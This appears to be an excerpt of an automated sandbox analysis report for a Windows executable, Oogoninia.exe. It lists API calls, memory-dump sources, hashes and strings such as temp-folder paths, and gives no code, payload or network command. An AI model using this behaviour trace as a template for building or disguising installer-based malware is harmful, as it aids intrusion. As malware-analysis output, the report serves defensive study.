• Instruction ID: 8cdf97aa15b56aed8909a69d1313546704d2aaf6dd9f7bed8459987902a8e277
• Opcode Fuzzy Hash: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
• Instruction Fuzzy Hash: EFE08632608111AAD31067705E0493B73B89A84710302083EF506F6292D7389C2196A9
APIs
• GetFileAttributesA.KERNELBASE(?,00402D3A,C:\Users\user\Desktop\Oogoninia.exe,80000000,?), ref: 00405A17
• CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405A39
Memory Dump Source
• Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
Similarity
• API ID: File$AttributesCreate
• String ID:
• API String ID: 415043291-0
• Opcode ID: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
• Instruction ID: 2848333a8a5b20597e43067d17cc290ce391feab13c7f73248cb22e1b8f9cacf
• Opcode Fuzzy Hash: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
• Instruction Fuzzy Hash: 5CD09E31658301AFEF098F20DD16F2EBAA2EB84B01F10962CBA82950E0D6755C159B26
APIs
• CreateDirectoryA.KERNELBASE(?,00000000,00403173,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403370), ref: 00405502
• GetLastError.KERNEL32 ref: 00405510
Memory Dump Source
• Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
Similarity
• API ID: CreateDirectoryErrorLast
• String ID:
• API String ID: 1375471231-0
• Opcode ID: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
• Instruction ID: 104873d821a1170e2273ca40e0eecd38832efcbc0b1179f41fab49dbd7078dd9
• Opcode Fuzzy Hash: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
• Instruction Fuzzy Hash: 23C04C70629501FBDA106B209E097177D55AB90745F1049766106E20F4DA749451D92E
Memory Dump Source
• Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
Similarity
• API ID: wsprintf
• String ID:
• API String ID: 2111968516-0
• Opcode ID: 4ba2856da63ff7f435db743ac2a14cc2248dd3629aba4a8dceb7604ea70bc87f
• Instruction ID: cbf00d81cb97437f3a5b335f5c35441536f11fd869f9e222d526ef6a243a720c
• Opcode Fuzzy Hash: 4ba2856da63ff7f435db743ac2a14cc2248dd3629aba4a8dceb7604ea70bc87f
• Instruction Fuzzy Hash: 9521C970D0429ABEDF218B9885486AEBF749F01314F1445BFEC95B63D1C2BE8A81CF19
APIs
• SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004026B3
  • Part of subcall function 00405CFE: wsprintfA.USER32 ref: 00405D0B
Memory Dump Source
• Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
Similarity
• API ID: FilePointerwsprintf
• String ID:
• API String ID: 327478801-0
• Opcode ID: abf4405e99e4dcb85fe8fe58243fd46f792263ec105484f86c7cee990d7a89bb
• Instruction ID: fecccce0915ab20f046520e702d9d3c2ebd546ffbad39029680d96f2603726cc
• Opcode Fuzzy Hash: abf4405e99e4dcb85fe8fe58243fd46f792263ec105484f86c7cee990d7a89bb
• Instruction Fuzzy Hash: B8E01BB1B05115AFD701EB956A4987F7769DF40328F10443BF141F50D1C67E4D429B6D
APIs
• WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 0040232B
Memory Dump Source
• Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
Similarity
• API ID: PrivateProfileStringWrite
• String ID:
• API String ID: 390214022-0
• Opcode ID: 6c1eb3e18aa1cf105a2872d21e97bfa3763926e12a5010dfe0d2da281f2b65f7
• Instruction ID: 5f6267e841dd840bf6295cbe1617e7a0042591bb1814ca2e8a4844537e2a2c78
• Opcode Fuzzy Hash: 6c1eb3e18aa1cf105a2872d21e97bfa3763926e12a5010dfe0d2da281f2b65f7
• Instruction Fuzzy Hash: 67E04F31B001246BD7307AB10F8E97F10999BC4304B39153ABA01B62C6EDBC4C414AB9
APIs
• SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401733
Memory Dump Source
• Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
Similarity
• API ID: PathSearch
• String ID:
• API String ID: 2203818243-0
• Opcode ID: 6ee8a2cb6661bb696876ffa748e538e6724bcba4671d5e56d17f999e1d815b23
• Instruction ID: e4e3c42305c0b2198e0aecdca264a5a1b937f2a52f25dfaad176198492f8ea82
• Opcode Fuzzy Hash: 6ee8a2cb6661bb696876ffa748e538e6724bcba4671d5e56d17f999e1d815b23
• Instruction Fuzzy Hash: CFE026B2304111AFE740DF68DE48EAA3B98DB10368F30453AF151F60C0E2BA9A41A769
APIs
• RegOpenKeyExA.KERNELBASE(00000000,00000642,00000000,00000022,00000000,?,?,?,00402383,00000002), ref: 00402C00
Memory Dump Source
• Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
Similarity
• API ID: Open
• String ID:
• API String ID: 71445658-0
• Opcode ID: fdb8ee867dc8347cd902a818e27750adf9bf7bda53abb5245a0d02fd0d3a8952
• Instruction ID: 12eae925539b7dc367c8ab6fa63785f67f6a0dd6345a275e5017c2f2efb43849
• Opcode Fuzzy Hash: fdb8ee867dc8347cd902a818e27750adf9bf7bda53abb5245a0d02fd0d3a8952
• Instruction Fuzzy Hash: ADE0B676250108BEDB00EFA9EE4AE9977ECAB58740F108421B608E70A1C678E5508B69
APIs
• ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403135,00000000,00000000,00402F82,000000FF,00000004,00000000,00000000,00000000), ref: 00405A9F
Memory Dump Source
• Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
• Instruction ID: 3049aa00f6096361bf05a549768cb7fbda67778921cce1d2793645b00ea59393
• Opcode Fuzzy Hash: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
• Instruction Fuzzy Hash: 56E08C3260521ABBEF119E508C40EEB3B6CEB043A0F008933F914E2180E230E8219FE4
APIs
• WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004030EB,00000000,007890F8,000000FF,007890F8,000000FF,000000FF,00000004,00000000), ref: 00405ACE
Memory Dump Source
• Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
• Instruction ID: 32d48f6e8b76b53ead5095efbfc7dc84fe3b04974c76bcad3a7819726962f715
• Opcode Fuzzy Hash: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
• Instruction Fuzzy Hash: CEE0B63261429AABDF109E659C40AAB7B6CFF05360F148533B915E6150E231E8219EA5
APIs
• VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 10002729
Memory Dump Source
• Source File: 00000000.00000002.1196297422.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.1196258164.0000000010000000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000000.00000002.1196329175.0000000010003000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000000.00000002.1196354573.0000000010005000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_Oogoninia.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
• Opcode ID: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
• Instruction ID: 4f82052a8ee677216feeb46ba648c84afb962adc58c95b92ee0d34447feb5494
• Opcode Fuzzy Hash: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
• Instruction Fuzzy Hash: B5F09BF19092A0DEF360DF688CC4B063FE4E3983D5B03892AE358F6269EB7441448B19
APIs
• GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402369
Memory Dump Source
• Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
Similarity
• API ID: PrivateProfileString
• String ID:
• API String ID: 1096422788-0
• Opcode ID: e46b05dc8f5ff29729b9ed40f267ec6ff0ae672f09ade1fc8e872b569ad31fa6
• Instruction ID: 863d308e192ce4c0f66b0ae01519e0470cfafd3cecd099ef988cf845eccf6abb
• Opcode Fuzzy Hash: e46b05dc8f5ff29729b9ed40f267ec6ff0ae672f09ade1fc8e872b569ad31fa6
• Instruction Fuzzy Hash: D1E08630A04208BADB10AFA08F09EAD3A79AF41710F24003AF9507B0D1EAB84481DB2D
APIs
• SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8
Memory Dump Source
• Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: b1bfa589af0f93098282614436603590eccf1b584019d2a6df4a412e22152707
• Instruction ID: 089d8403b4a3c67af6c4af196b8dedf915adbd4a042e4b2ee6fd832a67879694
• Opcode Fuzzy Hash: b1bfa589af0f93098282614436603590eccf1b584019d2a6df4a412e22152707
• Instruction Fuzzy Hash: 34D05B72704115DBDB10DBE5EB0869D77A0AB40364F304537D151F21D0D2BADA559719
APIs
• SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EC1,0002FFE4), ref: 00403146
Memory Dump Source
• Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                                                    • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                                                                                                                                    • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                                                                                                                                    • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
APIs
• Sleep.KERNELBASE(00000000), ref: 004014E9
Memory Dump Source
• Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 5103c2e833fb6cec983ac643f83c5405fcf5b56718913b7927d61a5481dde75b
• Instruction ID: a8a1054ff6e124a16992140d9831d4e67a861e682019e3b6a28de944f62df8e5
• Opcode Fuzzy Hash: 5103c2e833fb6cec983ac643f83c5405fcf5b56718913b7927d61a5481dde75b
• Instruction Fuzzy Hash: B5D05E73B141519BD750EBB8BAC445E77E4EB403257304837E502E2091E67989429618
APIs
• GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
Memory Dump Source
• Source File: 00000000.00000002.1196297422.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.1196258164.0000000010000000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000000.00000002.1196329175.0000000010003000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000000.00000002.1196354573.0000000010005000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_Oogoninia.jbxd
Similarity
• API ID: AllocGlobal
• String ID:
• API String ID: 3761449716-0
• Opcode ID: 6989041179a6ec659f8410a82a3610e1053cc9f4ca9d652552d89decbf4b4a90
• Instruction ID: 35b308b173d9b0532f6cde55f5bface33093279d7ce3c78a2cc6db588f634b90
• Opcode Fuzzy Hash: 6989041179a6ec659f8410a82a3610e1053cc9f4ca9d652552d89decbf4b4a90
• Instruction Fuzzy Hash: 6CA002B1945620DBFE429BE08D9EF1B3B25E748781F01C040E315641BCCA754010DF39
APIs
• GetDlgItem.USER32(?,00000403), ref: 00405156
• GetDlgItem.USER32(?,000003EE), ref: 00405165
• GetClientRect.USER32(?,?), ref: 004051A2
• GetSystemMetrics.USER32(00000002), ref: 004051A9
• SendMessageA.USER32(?,0000101B,00000000,?), ref: 004051CA
• SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004051DB
• SendMessageA.USER32(?,00001001,00000000,?), ref: 004051EE
• SendMessageA.USER32(?,00001026,00000000,?), ref: 004051FC
• SendMessageA.USER32(?,00001024,00000000,?), ref: 0040520F
• ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405231
• ShowWindow.USER32(?,00000008), ref: 00405245
• GetDlgItem.USER32(?,000003EC), ref: 00405266
• SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405276
• SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040528F
• SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040529B
• GetDlgItem.USER32(?,000003F8), ref: 00405174
  • Part of subcall function 00403FBA: SendMessageA.USER32(00000028,?,00000001,00403DEB), ref: 00403FC8
• GetDlgItem.USER32(?,000003EC), ref: 004052B7
• CreateThread.KERNEL32(00000000,00000000,Function_0000508B,00000000), ref: 004052C5
• CloseHandle.KERNEL32(00000000), ref: 004052CC
• ShowWindow.USER32(00000000), ref: 004052EF
• ShowWindow.USER32(?,00000008), ref: 004052F6
• ShowWindow.USER32(00000008), ref: 0040533C
• SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405370
• CreatePopupMenu.USER32 ref: 00405381
• AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405396
• GetWindowRect.USER32(?,000000FF), ref: 004053B6
• TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053CF
• SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040540B
• OpenClipboard.USER32(00000000), ref: 0040541B
• EmptyClipboard.USER32 ref: 00405421
• GlobalAlloc.KERNEL32(00000042,?), ref: 0040542A
• GlobalLock.KERNEL32(00000000), ref: 00405434
• SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405448
• GlobalUnlock.KERNEL32(00000000), ref: 00405461
• SetClipboardData.USER32(00000001,00000000), ref: 0040546C
• CloseClipboard.USER32 ref: 00405472
Strings
Memory Dump Source
• Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
Similarity
• API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
• String ID: @y
• API String ID: 590372296-2793234042
• Opcode ID: fb478b241302d14890c8e569f688314f17ac97b328ad1953f1dfc7460e5c88c7
• Instruction ID: 669047f9f67e304dd712f5be3c8e464dbcc99e7ae4a165c688d328355b6db051
• Opcode Fuzzy Hash: fb478b241302d14890c8e569f688314f17ac97b328ad1953f1dfc7460e5c88c7
• Instruction Fuzzy Hash: 9DA16970900249BFEF119FA0DD89EAE7F79EB08354F00806AFA05B61A0C7795E50DF69
APIs
• GetDlgItem.USER32(?,000003F9), ref: 0040494E
• GetDlgItem.USER32(?,00000408), ref: 00404959
• GlobalAlloc.KERNEL32(00000040,00000002), ref: 004049A3
• LoadBitmapA.USER32(0000006E), ref: 004049B6
• SetWindowLongA.USER32(?,000000FC,00404F2D), ref: 004049CF
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004049E3
• ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004049F5
• SendMessageA.USER32(?,00001109,00000002), ref: 00404A0B
• SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404A17
• SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404A29
• DeleteObject.GDI32(00000000), ref: 00404A2C
• SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404A57
• SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404A63
• SendMessageA.USER32(?,00001100,00000000,?), ref: 00404AF8
• SendMessageA.USER32(?,0000110A,?,00000000), ref: 00404B23
• SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B37
• GetWindowLongA.USER32(?,000000F0), ref: 00404B66
• SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404B74
• ShowWindow.USER32(?,00000005), ref: 00404B85
• SendMessageA.USER32(?,00000419,00000000,?), ref: 00404C82
• SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404CE7
• SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404CFC
• SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404D20
• SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404D40
• ImageList_Destroy.COMCTL32(?), ref: 00404D55
• GlobalFree.KERNEL32(?), ref: 00404D65
• SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404DDE
• SendMessageA.USER32(?,00001102,?,?), ref: 00404E87
• SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404E96
• InvalidateRect.USER32(?,00000000,00000001), ref: 00404EB6
• ShowWindow.USER32(?,00000000), ref: 00404F04
• GetDlgItem.USER32(?,000003FE), ref: 00404F0F
• ShowWindow.USER32(00000000), ref: 00404F16
Strings
Memory Dump Source
• Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
Similarity
• API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
• String ID: $M$N
• API String ID: 1638840714-813528018
• Opcode ID: 56b3b82b533b733a33c13492c2ad1bc1f2630ac234a6e512c7e667a37d25cb4c
• Instruction ID: 10d6cb261f95093856db0383de4589f8155b4d68da151c8c89fd000e0678f767
• Opcode Fuzzy Hash: 56b3b82b533b733a33c13492c2ad1bc1f2630ac234a6e512c7e667a37d25cb4c
• Instruction Fuzzy Hash: AB027CB0900209AFEB14DF64DC85AAE7BB9FB84314F10817AF610BA2E1D7789D51CF58
APIs
• GetDlgItem.USER32(?,000003FB), ref: 00404412
• SetWindowTextA.USER32(00000000,?), ref: 0040443C
• SHBrowseForFolderA.SHELL32(?,0079D918,?), ref: 004044ED
• CoTaskMemFree.OLE32(00000000), ref: 004044F8
• lstrcmpiA.KERNEL32(Call,0079E540), ref: 0040452A
• lstrcatA.KERNEL32(?,Call), ref: 00404536
• SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404548
  • Part of subcall function 0040557A: GetDlgItemTextA.USER32(?,?,00000400,0040457F), ref: 0040558D
  • Part of subcall function 0040600B: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Oogoninia.exe",766B3410,C:\Users\user\AppData\Local\Temp\,00000000,0040315B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403370), ref: 00406063
  • Part of subcall function 0040600B: CharNextA.USER32(?,?,?,00000000), ref: 00406070
  • Part of subcall function 0040600B: CharNextA.USER32(?,"C:\Users\user\Desktop\Oogoninia.exe",766B3410,C:\Users\user\AppData\Local\Temp\,00000000,0040315B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403370), ref: 00406075
  • Part of subcall function 0040600B: CharPrevA.USER32(?,?,766B3410,C:\Users\user\AppData\Local\Temp\,00000000,0040315B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403370), ref: 00406085
• GetDiskFreeSpaceA.KERNEL32(0079D510,?,?,0000040F,?,0079D510,0079D510,?,00000001,0079D510,?,?,000003FB,?), ref: 00404606
• MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404621
  • Part of subcall function 0040477A: lstrlenA.KERNEL32(0079E540,0079E540,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404695,000000DF,00000000,00000400,?), ref: 00404818
  • Part of subcall function 0040477A: wsprintfA.USER32 ref: 00404820
  • Part of subcall function 0040477A: SetDlgItemTextA.USER32(?,0079E540), ref: 00404833
Strings
Memory Dump Source
• Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
Similarity
• API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
• String ID: @y$A$C:\Users\user\slavelivets$Call
• API String ID: 2624150263-2138057794
• Opcode ID: 3d12c395db0b8a5e031a22e6692dd266f1d5deac6801d88cb2d33c24727f66a7
• Instruction ID: b79cf5757fdebc40129ea8bf430174fd55c22843b8008fc959c2d10819856cf3
• Opcode Fuzzy Hash: 3d12c395db0b8a5e031a22e6692dd266f1d5deac6801d88cb2d33c24727f66a7
• Instruction Fuzzy Hash: A3A170B1900209ABDB11EFA5CC45BAF77B8EF85314F10843BF611B62D1E77C9A418B69
APIs
• CoCreateInstance.OLE32(00407408,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040214C
• MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F8
Strings
• C:\Users\user\slavelivets, xrefs: 0040218C
Memory Dump Source
